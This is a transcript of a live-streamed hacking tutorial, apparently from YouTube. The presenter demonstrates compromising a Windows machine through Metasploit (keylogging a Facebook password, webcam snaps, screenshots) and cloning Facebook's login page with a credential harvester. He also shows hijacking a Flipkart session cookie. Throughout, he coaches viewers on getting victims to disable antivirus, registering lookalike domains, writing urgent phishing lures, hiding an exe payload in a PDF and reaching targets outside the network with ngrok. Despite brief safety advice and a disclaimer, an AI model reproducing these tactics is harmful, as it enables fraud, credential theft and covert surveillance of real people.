Now keep this thing in mind. As you can see, I had to switch off this defender. Now you might ask, sir, then how can I ask the user to, you know, switch off the defender, right? Now this is where your another thing comes, your social engineering skills comes. social engineering skill is very important. Okay, now what you can do here, you can actually, now all of you guys must have used torrent, right? You have downloaded cracked software, right? You have downloaded cracked games. Now what is written in those in their info? First of all, they will ask you to switch off your defender. Even some legit software ask you to switch off the defender or switch off your antivirus, right? The moment you switch off your antivirus, since you are actually asking him plainly, right, switch off your antivirus and I will install this game into your system. Okay, the moment the user feels, the moment the user feels, tempted towards downloading that, and he will switch off his defender. Once he switched off it, then you can just start hacking him. So we will just say 192.168.1.61 and we'll just download it once again, since our pretty antivirus just deleted it. So we'll just keep this, so keep it anyway, show in folder. All right, so we'll just, I think it is downloaded, hopefully. So once I double click on this one, run anyway, I should be able to get a Metasploit session. Okay, so we have successfully owned that system now. Now whatever data is inside that system is ours at this point of time. So if I do a sysinfo here and hit enter, as you can see, I can get the system information from there. Okay, and there are so many other commands that you can run. So if I just hit a question mark and hit enter, so these are all the commands that you can run. These are all the commands that you can run. You can remotely switch it off, switch it on. You can restart that system. Okay, you can just create a folder. You can write things. You can switch on. You can switch on the webcam. You can switch on the microphone. You can switch. You can start streaming. You can start web streaming from there. You can play a music file. You can hash them. You can do so many other things. Okay. Now let me just show you a few of them. All right. So let me just show a few of the functionalities over here. So okay, let's start. So first of all, what I want to do here is, let's start a thing called key scan. So if I just say key scan underscore start, it is going to start sniffing all the keyboard inputs of the user. Okay, now imagine once he has clicked on Avast and he's thinking that nothing happens on something like that, and he has, facebook.com opened, facebook.com. Okay, he goes to facebook.com and he logs in. Say, don't worry, this is not my original Facebook ID. Okay, and say the password is some complex password. Okay, say I will say a complex password like fall guys and a complex password, whatever, a long lengthy complex password. If I try to log in, I'm feeling pretty safe because I have a complex password, right? Okay, so if I try to log in, obviously this is a fake one, so it will not log in. But if I check here and if I just say key scan underscore dump, okay, as you can see, whatever key that guy has pressed, all you can see right over here. Okay, so if you look at this one, facebook.com, as you can see, he has also mistyped it. You can see that as well. So you can make out from here the name of that, the username is something at the gmail.com, right? He had also fixed that. Anyway, after that, obviously he must have entered the password fall guys, and then then this is the rest of the thing. So star at the rate star and many other complex characters. Okay, so what the password did we get? So if I just so from this, what I can make out is, so I will just open up a text file, so test.txt. So from what I get, the username is going to be gmail.com, that we already know, and the password is going to be like fall, and if I look at here, it is going to be like fall, it is going to be guys, and then shift, nothing else, and then this part, okay. I will just copy this one and paste is this. So this should be, sorry, this should be the password, right? Now let's check, did he really enter this password? So if I go back, okay, I didn't save it. All right, so it must be the password. Okay, so whatever key press he must have done, you can make it out. Okay, you can make it out. Now this is not the best part. This is not yet the best part. You can actually switch on the webcam. Since I am running it on a virtual machine, I won't be able to switch on it. Yeah, I won't be able to switch on it, but if these two systems were different, then I would have. Okay, you could have easily switched on the webcam. Okay, I can do one thing here. I can actually start streaming the desktop that he's using. Okay, now for that, what we will do, we will just use this command, screen share. I think that is the command. So if I start screen share, I should be able to get something out of it. Okay, it is not supporting Firefox. That is the reason why, I guess. Okay, so if I just go to the root directory, I should be able to get to the root directory here. Okay, and in here there should be okay, so if I double click on this one, should it be able to open this one? Okay, address wasn't understood. I think as a root user, you won't, as a normal user, you won't be able to use it. You won't be able to switch it on. What this will do, this is going to actually stream the complete desktop of the user, whatever he is using at this point of time. Okay, either way, I will just try it once again and see if it is able to open it. Okay, it is unable to use this as a root user. Okay, let me just try another thing. Chromium. Okay, no installation candidate. If Firefox does not do it, I hope Chromium should be able to do it. If you guys are using Kali or Parrot, easily it can open up as a root user. Or if you are using as a root user completely, say for example you have logged in as a root user, then you could have opened it easily. Alright, so let me just check. Let me just install this first and see what happens. In the meantime, we will just try it once again later on. In the meantime, you can actually do screenshot, and you can actually save a screenshot of that desktop. Okay, it is saved in this directory. We should be able to get the image file. I think this is the image file. ANC. Okay, root. Just go to the root one, and there it is. There it is, JPEG file. So let's see if it really does take the screenshot. Okay, so since I am using this one, so it has taken the screenshot of the VMware. Okay, so that is the thing. So as you can see, this is the screenshot over here. This is a screenshot of the desktop that is running at that point of time. Since I am using the same desktop to take the screenshot, it is taking my own screenshot. Okay, all right, apart from this one, there are many other commands that you can run. Say for example, okay, fine. So let me just show you a few of the commands. Let me just clear this one out. Yeah, so at this point of time I can make out in which directory I am. So as you can see, I am in C user Sagar downloads, right? In this directory I am inside it, right? So I can just navigate to any directory I want. So I can just go to like cd say ... and this will go back to this directory. And if I say dir, it will list down all the directory in that particular folder. So as you can see, these are all the directories, all the folders inside that Windows system. After this, if I want to go to desktop, okay, and I want to create some mischievous tasks, so I can just go to cd desktop, okay, and if I say dir, as you can see, these are the different things that are present on the desktop. But what I am going to do, I am just going to create a folder, say hacked, okay, and I will get inside that folder and I will just create a file, edit, say hacked.txt, and in here I will just write, in here I will just write, say, just a moment, okay, in here I will just write, okay, the vim is not working correctly, wq, edit hacked. Alright, so if I just type here you okay, the keyboard is not working properly, sorry guys. Just a moment. The VI editor is not working here properly, guys. Just a moment. Okay, nonetheless, if I just type something here, escape. Okay, this one is working, but the insert, is it working? Insert, yes, it is working now, I guess. So if I just type here, say you have, or whatever, have been hacked or something like that, I'll just escape this, save this and exit it. So we should be able to get a folder there and a tag.txt there. So as you can see, we get a folder and we have hack.txt. If I open this with notepad, as you can see, okay, all right, so you can actually create a folder, you can create a text file or whatever. You actually have the complete control over that system. Okay, fine. Now there are many other commands, you can just play around with them. Okay, you can record mic, you can start webcam, you can just list them, you can take a webcam snap, you can just start a stream. Okay, let's try a webcam snap. Okay, now obviously I will not be showing my face. All right, so webcam snap, let's see. Okay, so yeah, that's me. Unfortunately, I came in the snap. Okay, that's me. So as you can see, you got the snap from the photo. Okay, so basically you can have the complete control over that system. You can do whatever you want, it's yours. Okay, so be careful what you guys click on and what you download from the torrent. All right, fine. So up to this point, this was your system hacking. I'll just exit from here. I'll be killing the session. So session -k, and I think it is one. Yeah, sessions -i. They should show me these sessions. Okay, no active sessions, and there we go. And there we go. So that was an example of system hacking. Okay, and how hackers can manipulate you into clicking those DXEs and how you can fall prey to them. Okay, they will have complete control over your system, and not only that, while the hacking is going on, you won't be able to delete this. Okay, so since I have already deleted that connection, I should be able to delete this. Let me just try. Okay, so it is deleting. So if the hacker is still on the connection, you won't be able to delete this. Okay, so your system's complete control goes to the hacker. You can actually do a reboot, you can actually shut down that machine as well. I cannot show shut down as because the live stream will end. Okay, so otherwise I would have shown you guys. Okay, anyway, so that was a part of your system hacking, right? Similarly, you can also create Android payload. Now, due to the lack of the time, I won't be able to show you the Android payloads. Now if you guys want to learn in more details how this is done, why this is done, and if you want to do it completely manually, then you are free to come here and join our course on ethical hacking. All right, fine. So we here also show how this can be done on Android devices as well. Okay, anyway, so let's move on to our next part, that is the web part. Okay, now let's see how a malicious link can be really dangerous to you guys. Okay, all right, for this we are going to need the help of Facebook again, and we are going to use a tool called set toolkit. Now to install that, we will be using root user again. I will just delete this snapshot, sudo su. All right, fine. So in the Firefox browser, I will be searching for set toolkit. We will go to the first link. Okay, Google still thinking is that I am a Russian. Okay, so I will just go to the code. I will just copy this one just like before. I'll minimize this, and in here I will just paste git clone and paste that link over here, and then hit enter. It will take some time to download these things. Okay, someone is writing that sir, I have one issue, package tor has no installation candidate. Hello, can you just tell me which Linux system you are using? That will help me a lot. Sir, I think exploit spy is easy than Metasploit. Yes, it is easy, but there is certain things that you don't get in exploit spy compared to a Metasploit. Since this is just the basic demo, there are so many other things that you can do with Metasploit. Huge amount of things can be done with the help of Metasploit. Okay, now exploit spy is like a tool that you can use easily, but it does not have that much of a functionality as Metasploit. Okay, Rakesh, can you just tell me which operating system you are using? Then that will help me a lot. Okay, so if you are using Kali Linux, then just do one thing. Just type there sudo apt update. First of all, you have to update the repository of Kali Linux. If you have done that already, then try to install tor again. Sudo apt install tor. All right. So we have actually cloned it from Git, and we must have, okay, so it cloned it completely right over here, I guess. Okay, so we have that social engineering toolkit, and we have set toolkit, we have social engineering toolkit right over here. So we'll just go to the set toolkit, cd set toolkit, cd social engineering toolkit, sorry, my bad. And in here, as you can see, there are so many things over here, right? So now how you can install this? First of all, just go down, and you can see like you can actually copy this and paste this commands there as well. It will automatically install your all the things necessary. As you can see, cd set toolkit, pip install -r requirements.txt, python setup.py. Just follow these commands and you will be good to go. So what I will do, I will just delete. Since I have already downloaded this, I will just delete this folder. Okay, just a moment. ls rm-rf social engineering toolkit. Yeah. So the next step is cd set toolkit. So we'll just go to the set toolkit directory. After that, it is saying that pip3 install -r requirements.txt. Now keep this thing in mind. Sometimes it may happen that pip3 is not installed in your system. Then just install it. Apt install python 3 -pip. Now this will install pip3 in your system. Okay. Just hit enter. Since I have already installed it, it is not going to install it again. Fine. Now just hit pip3 install -r requirements.txt, and this should be able to install all the necessary files that it requires to run this particular software. Okay, after that, it is saying that python setup.py, don't hit to it, you must give python 3 setup.py, not only python 3 setup.py. Hit enter and it should be able to install this thing. since I have already installed it, it is like saying file already exists. If you haven't installed it, then it will actually create this file and will install whatever you are trying to install in it. Okay, and you should be good to go now. Fine, let's fire up set toolkit. Okay, no command found. Fine, so set toolkit. Yeah, all right, so this is how the set toolkit would look like. So what we are going to do here is we are going to do some kind of a social engineering attack. So we will click on one. Okay, then we will be using website attack vectors. So we will choose 2. We will be using credential harvester attack method. So we are my main target will be to get the credentials of the Facebook, okay, of my victim. So credential harvester attack. So I will just click on 3. And from here I will use site cloner. I want to clone the website of Facebook. And tab nabbing, so IP address for the post back harvester tab nabbing. This means that to where that harvested data should reach. Like you want that data, whatever he is trying to collect from the user should reach to you, right? So what you will do, you will just give your own IP address, 61. Okay, now keep one more thing in mind. While you are running this, Apache server should not be running. So I will just switch this off. Service Apache to stop. Yeah, fine. Now it is asking for the URL to clone. No worries, I will just give facebook.com and it will just fetch it from there. All right, I think we are good to go now. Yep, we are good to go now. Now the IP address here is, so if I just go to my browser and if I just say 192.168.1.61, I should get redirected to a Facebook page. Okay, so it is still running. Yes, so there you see Facebook's login page, and it has also taken the regional language as well, right? The regional language is also visible over here. Now keep this thing in mind that since I am just showing you a demo version of it, it is IP address over here. You can actually put this, you can just copy this and you can just buy a domain, just like I have told you before. If you just go to GoDaddy and if you just search for, say, close, if you just search, say, for, obviously facebook.com won't be available because facebook.com domain is already have been taken by Facebook. So what I will do, to fool the user, I will use facbook.com. Okay, now this looks promising, right? So if I search it, I should be able to get a few of them. So as you can see, facebook.in, faccbook.org. Now this does looks like Facebook, right? So you can actually buy this domain for such a low price and you can upload this web page there. And if you do that, and if you send that link to your whoever your victim is, so he will be get fooled easily, right? He will get fooled easily. He won't even look at the URL. So whenever you are trying, whenever you get a link from somewhere, it is mandatory you must look at the URL first. Only click on those links which you trust. Obviously if I use this link, this does not resemble the facebook.com's actual link, right? It should be FACE, not FACC. Same goes for Amazon. A few days back, like you guys must have also seen, a few days back we have seen a scam where we had like amazon.in and like people were saying that you can buy a mobile at very low cost, like in 600 rupees or 700 rupees, right? Now if you have looked carefully, it was amazon.com with double N. Obviously that is not a legit website. That website was created just to get the details, that the credential of your Amazon account from there. And as we know, Amazon account is also linked up with your Amazon Pay account, right? Now you can feel the gravity of such a situation. So once he goes to this link, he will be greeted with this Facebook's login page. Now say if I enter my Facebook credentials, say I have a complex password, right? And I just gave my complex password, joker@123/4_AR whatever *765. It's a complex password. Now if I go to the developer mode and if I just do inspect element and instead of this password, if I just type text, you guys can see the password that I have written over here. So this is the password. Okay, now this is a complex password, right? The user might feel very safe about it. Once he clicks on login, he will be redirected to the original Facebook's page. He will be redirected to the original Facebook page. Now the user might think, okay, so the previous link did not work, might be some issue with my network. That happens with us, correct? Now you should send this link in such a way that the user feels urged to click on that link. Say for example, click on this link and log in with your Facebook and know how you can be safe from corona, right? You can now these kind of campaigns are being used by hackers in real life to target normal people. Okay, huge amount of people will be clicking on this link, logging in with their credentials to know about corona and all, but it's just a scam. Okay, so don't click on any link. If you don't trust that link, don't click it. Look at the URL first. Look at the URL first. Search that URL, whether that URL is legit or not. If it is not, never click on that link. Okay, now let's check what this have resulted in. So if I go back here, as you can see, so much of data has come to me. I am not bothered with all this data. All I want is the username, password. If you look at here, I got the username and password. Okay, it does not matter how complex password it is, I am able to see it. Okay, I am able to see it. Now you guys get it, that do not click on any link. Now if you see on different Facebook pages, like you will find links like click on this link and find out which Avenger you are, click on this link and find out after 7 years like which Bollywood star you are. Okay, don't get tempted with all these links. Okay, most of these links are just a scam. Be very careful about it. Okay, check the URL carefully, see if it is trusted, then only put your credentials there. Okay, now think if I have done this with a banking website. Okay, now obviously nowadays to avoid this, banking website have implemented many other protections like two-factor authentication and OTP security and all that. But in few years back, banking, when they did not have such kind of a security, these kind of attacks did really reveal a lot of user credentials and data into the dark web and deep web. Now this is how, with the help of these links, this is how hackers actually accumulate such large amount of data, such large amount of username and password, and sell them in the dark web market. Okay, now then Facebook will release, okay, we have a data breach, this million passwords have been hacked, this million Facebook accounts has been hacked, this million Twitter accounts has been hacked. This is how it is done. Okay, this is how it is done. All right. Okay, so this was a small demo how not to click on any link. Okay, so be careful. So I will just switch this off now. Okay, someone is asking, it can be used many times. Yes, it can be used many times in a session, does not matter. You can send it to as many people as you want, does not matter. You will get all of their information. Okay, now don't do this. Okay, don't do this in real life. Okay, don't try to create web pages like this and send to your friends. Okay, this is just for educational purpose, just to show you guys how hackers get your credentials, so that you can be safe and you can actually tell others to be safe and how to be safe. Okay, all right, now let's go to the next one. What we have next one is a pretty interesting thing. All right, so Facebook बहुत खेल लिया, ठीक है? We have played Facebook so far so many times. Right, now let's try something else. अभी Big Billion Day चल रहा है, right? Flipkart. All right. Now Flipkart also has some issues, right? Flipkart में हम लोग का user data रहता है ना? हम लोग का email ID रहता है, हम लोग का phone number रहता है, and sometimes our payment details as well, our cards, our credit card, our debit card details and all that, right? What will happen if someone is able to hack your account without even using the username and password? Is that even possible without using username and password? Yes, it is. Let's see how it is. How is it's possible? Okay. Now for doing this, what you are going to need, we are just going to need a cookie. We are just going to need the cookie value of this user. Obviously, this is me, myself. I am logged into it. And what I am going to try here is, I am going to log in to my, I am going to log into my Flipkart's account using this machine without using the username and password. Okay, if I am able to do this with my account, I can do this with anyone's. Okay, so what we are going to do this, how we are going to do this, first of all, I need the cookie value of this user. Okay, now that can be fetched in many different ways with the help of JavaScript, with the help of some kind of a malicious website or a malicious link. It can be done. Okay, now for the sake of simplicity, so that you can see how it is happening, what I will do, I will just install an add-on in Firefox called cookie editor. Now what is this cookie? Basically, cookie is a random string with the help of which the server is able to identify the authenticated user. Now what I mean by that is, once you log into Facebook, if you guys remember, once you log into Facebook and after logging in, if you try to upload a picture in Facebook, or if you want to, you know, update your profile picture on all that, you don't need to log in again, right? So whatever you do inside that profile, you don't need to prove your identity again and again. So that means what? The server knows that you are an authenticated user. How the server will identify that? With the help of that cookie value. Okay. Now this type of attack is applicable for any website. For any website, be it Flipkart, be it Facebook, be it Gmail, it is applicable for any website. But you need to find out a certain thing. Let's see what it is. So you can just put okay, so the thing that I need is cookie editor. Cookie editor. I think, yeah, this one. I'll just add this to Firefox. And we will do the same thing in hacker's system as well. Obviously, the hacker must have that extension. Okay, the extension that I want is cookie editor. So just add this to Firefox. Alright, so we have our cookie editor over here, and yeah, I think this is what this is the one. Let me just check once. Yeah, this is the one. Alright, so I will just close this one up. We'll go back to our Windows system. Okay, so and I will just refresh this page once. Okay, so this is me. This is I've logged in. I will just go to my profile, and as you can see, these are my data, whatever. And let's try to hack this one. Okay, without using the username and password or the login credentials. So what I need here is a particular value called the SN value. This is the particular cookie value that is being sent from this device to the server, to the Flipkart server, through which the Flipkart is able to identify who I am. Okay, now if I copy this one, if I am able to somehow get this data, so let's just see if I can just paste this test.txt. Okay, I won't be able to paste this, so I think I need to send this by some means. So what I will do, I will just create a new folder over here, not a new folder, a text file, say test.txt, and in here I will just paste that cookie value. Alright, so this is the cookie value. I will just save this, and in the desktop I will just start a Python local server so that I can use, get this value into my Ubuntu system. Python. Okay, I should be able to get this now. Okay, so if I go sorry, if I go here and go to my browser, (192.168.1.27), I think 1.27, sorry, 27, and the port number is 8080. Okay, and there it is, test.txt. I will just copy this thing and I will just go to Flipkart. Obviously I have not logged into Flipkart in from this machine, and let's try to log in without using the username and password. Now what I will do, the value that I have copied from there, I am just going to go to this cookie editor, will go to that particular value, I will erase this value and paste it. Okay, and once this is done, I will just save this and refresh this. Let's see if I log into my profile or not. So if I just reload this page, as you can see, without using the username and password, I am able to log in. Okay, no, okay, so okay, in the chat someone is asking, but this process is possible if we have the access to victim machine, otherwise how will we get the cookies of the victim? Actually that is not completely true. You can get the victim's cookie by so many other ways. If you guys remember, when you open a web page, certain web page will ask you something like allow cookies or not, right? Some web pages are there, or you can create a malicious web page that you can send the link to that user, which will extract all the cookies from the browser. Okay, and you can use those cookies to your advantage. Now there is one catch. I will tell you, there is one catch. As you can see, I have logged into this victim's machine easily. I am logged into this victim's profile easily without using the username and password. Okay, now this would not have been possible if the user had logged out of his machine. Keep this thing in mind whenever you are logging into anything, say Flipkart, be it Facebook, be it a Gmail, always do not forget to log out. The moment you log out, that cookie value get erased. That particular value with which the authentication happens gets erased. Okay, so always remember to log out. This attack is possible when the user does not logs out. Okay, so that is why logging out is very, very important. Now look at this. Now if I log out of this system, if I log out of this web page, okay, let me just give it some time to log out. Okay, so I have logged out of this web page. Now if I go here, okay, I am still logged in, but if I refresh this page, I should not be able to access it again. Okay, it's coming a bit longer now. It will take some time to do that. As you can see, I am still inside my profile. So if I go to mobiles, okay, so if Flipkart is not logging me out from the attacker's machine, then I must say Flipkart has a critical vulnerability here. Okay, so I am still logged in. That's weird. That should not happen though, since I have logged out of here. Now if I go here, let me just check again. Alright, so I am still here. Okay, that's bad. That's not the correct thing. Alright, so I think that a few days back I had checked the same vulnerability on Flipkart. They did not have this vulnerability. They actually used to log out. Once you log out, that cookie must get destroyed. But right now, while showing you guys, I figured out that that cookie is not getting destroyed in Flipkart. Now that is really, really bad. Though the user has logged out from that, from this web page, from his own machine, in the attacker's machine, it's still logged in. Okay, now that's weird. Okay, we will come to this one later on again. Okay, so basically to be safe from this kind of attack, always log out. Okay. Once you log out, that cookie value must get destroyed. That cookie value will get destroyed. Now this is a critical vulnerability in Flipkart that right now I found out. Okay, this should not be happening. Okay. All right. Okay, so up to this point, is it clear? Like why you should log out? Okay, because that cookie value can be used by malicious hackers to use against you. Now this attack is applicable on any website, be it Flipkart, be it Facebook, be it Gmail, be it any other login site, okay, but obviously you have to find out that particular value that you can, okay, that is responsible for this kind of an attack. All right. Okay, now let's see from the chats. Did you like this session? Since the session is it's nearing its end now. All right, so let's see what are your questions now. Okay, sir, you found a bug, you will get bounty. Hopefully. Okay, I will go for the bounty. Yes, of course you can. Okay, can you suggest anything to get cookies of victim's machine? Yes, basically what you can do here is you need to create a JavaScript. You need to create there are many scripts available in GitHub, be it PHP based, be it JavaScript based, that will extract cookie from a particular website. Okay, not only that, let me just tell you one other thing. As you can see in the Firefox, you have to install an extension to drag out those cookies. But if you use Google Chrome, let's have a look. Google Chrome, since we have some time here, so let's have a look. So if I use this same thing with Google Chrome, actually Google Chrome saves this cookie within itself. No need to install any kind of an extension. Now you can imagine with a simple, now since JavaScript runs on the browser, you can actually access these cookies. Okay, so if I just download Google Chrome, let me just show you where it is. Just install this one. Thank you so much guys for the replies. Okay, now okay, some of you are asking like sir, will two-step verification help our safety? Of course it will. Now two-step verification also depends. Now to be honest, it is not that like two-step verification is not hackable. Okay, two-step verification is not hackable. It is not that. It can be hacked, but like it depends actually, like what kind of two-step verification you are performing, whether you are using like an OTP, or like you are using some kind of a passkey that you have provided to your user and you have asked him to keep safe. Those kind of two-step authentication where you are sending some kind of an OTP or some kind of an email or some kind of a thing that is with the user itself. In that scenario, yes, two-step authentication will help a lot. Okay, sir, can we create a PDF payload? Yes, of course you can create PDF payload. I just gave you a hint in this session. Use WinRAR. If you use WinRAR, you can actually bind a exe payload with the PDF file. Okay, and the moment the user clicks on that PDF, the PDF will open up, but in the background your payload will run. Okay. Now I cannot show this in YouTube because otherwise YouTube will ban us. Okay, all right. So in the Google Chrome, as I have told you, if I just go to flipkart.com, and if I try to just log into it, I'm just logging in. Alright, so if I log in here, never, don't save it, never. Okay, once I have logged in, that is fine. Now if I go to the settings part of the browser, sir, I made an Android payload I have installed on the Android phone, but the session didn't connect. Was your phone in the same network or was it using your mobile network? Just tell me that. If it was using your mobile network, then you need to use ngrok or other stuff to hack outside the network. Whatever I have shown you today is within the network. We cannot show how you can hack outside the network on YouTube due to certain restrictions, unfortunately. Alright, okay, so in the Google setting, if you just search for cookies, okay, and if you just go to cookies and other site datas, and in here if you just go down here, see all cookies and site datas, and as you can see, Flipkart has 6 cookies. Okay, Flipkart has 6 cookies. If you just search for those cookies, you should be able to get that SN value without the need of installing any kind of a, as you can see, here it is. Okay, so as you can see, without the need of any kind of a extension, you can actually extract that payload. You can actually extract that cookie, sorry. Okay. All right. So this was a vulnerability in Google. So that in that way, Google is a bit more vulnerable than your Firefox. Okay. In Firefox, you have to like install those extension, and then you will be able to access those cookies. But in Chrome, you can access those cookies easily. All right. All right. Let's see in the chat now. Okay. Sir, what must be the config of a laptop for cybersecurity student? Okay, for that basically you go with a 8 GB RAM and a R5 processor, i5 processor. Yeah, okay, fine. Okay, someone has already replied it. It's good. Okay, not 6 GB RAM, it will be 8 GB RAM. Oh, thank you. You are a great hacker. Love this session. Thank you. Okay, sir, sometimes connecting to unknown Wi-Fi can get data hacked. Of course, it can. Open Wi-Fi, kahin pe hua, if you have a connection to open Wi-Fi, do not connect with it. Okay, it can leak so much of your personal data and all. Okay, it is not within the scope of my session right now. Otherwise, I would have shown you guys. Okay. All right, our time is up, almost up. Okay, guys, I hope you liked this session. Okay, thank you guys for attending this live session. I hope you have enjoyed this session. Okay, let me just minimize this. No more Flipkart. Okay. All right. I hope you have enjoyed this session. Hit the like button if you have liked this session. Hit the subscribe button if you have enjoyed it. If you want more such hacking videos, just subscribe to our channel. Press the bell icon so that you can get notified whenever a new video is uploaded. Okay. Thank you guys. Stay safe. Wear a mask. Happy Durga Puja.